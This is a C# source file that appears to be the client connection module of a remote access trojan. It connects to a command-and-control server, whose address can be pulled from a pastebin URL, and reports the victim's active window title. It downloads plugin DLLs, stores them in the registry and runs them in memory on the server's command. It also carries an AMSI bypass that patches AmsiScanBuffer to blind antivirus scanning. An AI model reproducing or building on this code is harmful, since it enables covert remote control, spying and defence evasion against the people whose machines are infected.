using Client.Helper; using System; using System.Diagnostics; using System.IO; using System.Net.Sockets; using System.Threading; using System.Net.Security; using System.Security.Authentication; using System.Security.Cryptography.X509Certificates; using System.Net; using MessagePackLib.MessagePack; using System.Collections.Generic; using System.Linq; using System.Reflection; using System.Runtime.InteropServices; namespace Client.Connection { public static class ClientSocket { public static Socket TcpClient { get; set; } //Main socket public static SslStream SslClient { get; set; } //Main SSLstream private static byte[] Buffer { get; set; } //Socket buffer private static long HeaderSize { get; set; } //Recevied size private static long Offset { get; set; } // Buffer location private static Timer KeepAlive { get; set; } //Send Performance public static bool IsConnected { get; set; } //Check socket status private static object SendSync { get; } = new object(); //Sync send private static Timer Ping { get; set; } //Send ping interval public static int Interval { get; set; } //ping value public static bool ActivatePo_ng { get; set; } public static List Packs = new List(); public static void InitializeClient() //Connect & reconnect { try { TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp) { ReceiveBufferSize = 50 * 1024, SendBufferSize = 50 * 1024, }; if (Settings.Paste_bin == "null") { string ServerIP = Settings.Hos_ts.Split(',')[new Random().Next(Settings.Hos_ts.Split(',').Length)]; int ServerPort = Convert.ToInt32(Settings.Por_ts.Split(',')[new Random().Next(Settings.Por_ts.Split(',').Length)]); if (IsValidDomainName(ServerIP)) { IPAddress[] addresslist = Dns.GetHostAddresses(ServerIP); foreach (IPAddress theaddress in addresslist) { try { TcpClient.Connect(theaddress, ServerPort); if (TcpClient.Connected) break; } catch { } } } else { TcpClient.Connect(ServerIP, ServerPort); } } else { using (WebClient wc = new WebClient()) { NetworkCredential networkCredential = new NetworkCredential("", ""); wc.Credentials = networkCredential; string resp = wc.DownloadString(Settings.Paste_bin); string[] spl = resp.Split(new[] { ":" }, StringSplitOptions.None); Settings.Hos_ts = spl[0]; Settings.Por_ts = spl[new Random().Next(1, spl.Length)]; TcpClient.Connect(Settings.Hos_ts, Convert.ToInt32(Settings.Por_ts)); } } if (TcpClient.Connected) { Debug.WriteLine("Connected!"); IsConnected = true; SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate); SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false); HeaderSize = 4; Buffer = new byte[HeaderSize]; Offset = 0; Send(IdSender.SendInfo()); Interval = 0; ActivatePo_ng = false; KeepAlive = new Timer(new TimerCallback(KeepAlivePacket), null, new Random().Next(10 * 1000, 15 * 1000), new Random().Next(10 * 1000, 15 * 1000)); Ping = new Timer(new TimerCallback(Po_ng), null, 1, 1); SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null); } else { IsConnected = false; return; } } catch { Debug.WriteLine("Disconnected!"); IsConnected = false; return; } } private static bool IsValidDomainName(string name) { return Uri.CheckHostName(name) != UriHostNameType.Unknown; } private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) { #if DEBUG return true; #endif return Settings.Server_Certificate.Equals(certificate); } public static void Reconnect() { try { Ping?.Dispose(); KeepAlive?.Dispose(); SslClient?.Dispose(); TcpClient?.Dispose(); } catch { } IsConnected = false; } public static void ReadServertData(IAsyncResult ar) //Socket read/recevie { try { if (!TcpClient.Connected || !IsConnected) { IsConnected = false; return; } int recevied = SslClient.EndRead(ar); if (recevied > 0) { Offset += recevied; HeaderSize -= recevied; if (HeaderSize == 0) { HeaderSize = BitConverter.ToInt32(Buffer, 0); Debug.WriteLine("/// Client Buffersize " + HeaderSize.ToString() + " Bytes ///"); if (HeaderSize > 0) { Offset = 0; Buffer = new byte[HeaderSize]; while (HeaderSize > 0) { int rc = SslClient.Read(Buffer, (int)Offset, (int)HeaderSize); if (rc <= 0) { IsConnected = false; return; } Offset += rc; HeaderSize -= rc; if (HeaderSize < 0) { IsConnected = false; return; } } Thread thread = new Thread(new ParameterizedThreadStart(Read)); thread.Start(Buffer); Offset = 0; HeaderSize = 4; Buffer = new byte[HeaderSize]; } else { HeaderSize = 4; Buffer = new byte[HeaderSize]; Offset = 0; } } else if (HeaderSize < 0) { IsConnected = false; return; } SslClient.BeginRead(Buffer, (int)Offset, (int)HeaderSize, ReadServertData, null); } else { IsConnected = false; return; } } catch { IsConnected = false; return; } } public static void Send(byte[] msg) { lock (SendSync) { try { if (!IsConnected) { return; } byte[] buffersize = BitConverter.GetBytes(msg.Length); TcpClient.Poll(-1, SelectMode.SelectWrite); SslClient.Write(buffersize, 0, buffersize.Length); if (msg.Length > 1000000) //1mb { Debug.WriteLine("send chunks"); using (MemoryStream memoryStream = new MemoryStream(msg)) { int read = 0; memoryStream.Position = 0; byte[] chunk = new byte[50 * 1000]; while ((read = memoryStream.Read(chunk, 0, chunk.Length)) > 0) { TcpClient.Poll(-1, SelectMode.SelectWrite); SslClient.Write(chunk, 0, read); SslClient.Flush(); } } } else { TcpClient.Poll(-1, SelectMode.SelectWrite); SslClient.Write(msg, 0, msg.Length); SslClient.Flush(); } } catch { IsConnected = false; return; } } } public static void KeepAlivePacket(object obj) { try { MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Pac_ket").AsString = "Ping"; msgpack.ForcePathObject("Message").AsString = Methods.GetActiveWindowTitle(); Send(msgpack.Encode2Bytes()); GC.Collect(); ActivatePo_ng = true; } catch { } } private static void Po_ng(object obj) { try { if (ActivatePo_ng && IsConnected) { Interval++; } } catch { } } public static void Read(object data) { try { MsgPack unpack_msgpack = new MsgPack(); unpack_msgpack.DecodeFromBytes((byte[])data); switch (unpack_msgpack.ForcePathObject("Pac_ket").AsString) { case "po_ng": //send interval value to server { ClientSocket.ActivatePo_ng = false; MsgPack msgPack = new MsgPack(); msgPack.ForcePathObject("Pac_ket").SetAsString("po_ng"); msgPack.ForcePathObject("Message").SetAsInteger(ClientSocket.Interval); ClientSocket.Send(msgPack.Encode2Bytes()); ClientSocket.Interval = 0; break; } case "plu_gin": // run plugin in memory { try { if (SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString) == null) // check if plugin is installed { Packs.Add(unpack_msgpack); //save it for later MsgPack msgPack = new MsgPack(); msgPack.ForcePathObject("Pac_ket").SetAsString("sendPlugin"); msgPack.ForcePathObject("Hashes").SetAsString(unpack_msgpack.ForcePathObject("Dll").AsString); ClientSocket.Send(msgPack.Encode2Bytes()); } else Invoke(unpack_msgpack); } catch (Exception ex) { Error(ex.Message); } break; } case "save_Plugin": // save plugin { SetRegistry.SetValue(unpack_msgpack.ForcePathObject("Hash").AsString, unpack_msgpack.ForcePathObject("Dll").GetAsBytes()); Debug.WriteLine("plugin saved"); foreach (MsgPack msgPack in Packs.ToList()) { if (msgPack.ForcePathObject("Dll").AsString == unpack_msgpack.ForcePathObject("Hash").AsString) { Invoke(msgPack); Packs.Remove(msgPack); } } break; } } } catch (Exception ex) { Error(ex.Message); } } private static void Invoke(MsgPack unpack_msgpack) { Assembly assembly = AppDomain.CurrentDomain.Load(Zip.Decompress(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString))); Type type = assembly.GetType("Plugin.Plugin"); dynamic instance = Activator.CreateInstance(type); instance.Run(ClientSocket.TcpClient, Settings.Server_Certificate, Settings.Hw_id, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), MutexControl.currentApp, Settings.MTX, Settings.BD_OS, Settings.In_stall); Received(); } private static void Received() //reset client forecolor { MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Pac_ket").AsString = "Received"; ClientSocket.Send(msgpack.Encode2Bytes()); Thread.Sleep(1000); } public static void Error(string ex) //send to logs { MsgPack msgpack = new MsgPack(); msgpack.ForcePathObject("Pac_ket").AsString = "Error"; msgpack.ForcePathObject("Error").AsString = ex; ClientSocket.Send(msgpack.Encode2Bytes()); } } public class Amsi { // https://twitter.com/_xpn_/status/1170852932650262530 static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; public static void Bypass() { if (is64Bit()) PatchAmsi(x64); else PatchAmsi(x86); } private static void PatchAmsi(byte[] patch) { try { var lib = Win32.LoadLibrary("amsi.dll"); var addr = Win32.GetProcAddress(lib, "AmsiScanBuffer"); uint oldProtect; Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect); Marshal.Copy(patch, 0, addr, patch.Length); } catch (Exception e) { Console.WriteLine(" [x] {0}", e.Message); Console.WriteLine(" [x] {0}", e.InnerException); } } private static bool is64Bit() { bool is64Bit = true; if (IntPtr.Size == 4) is64Bit = false; return is64Bit; } } class Win32 { [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name); [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); } }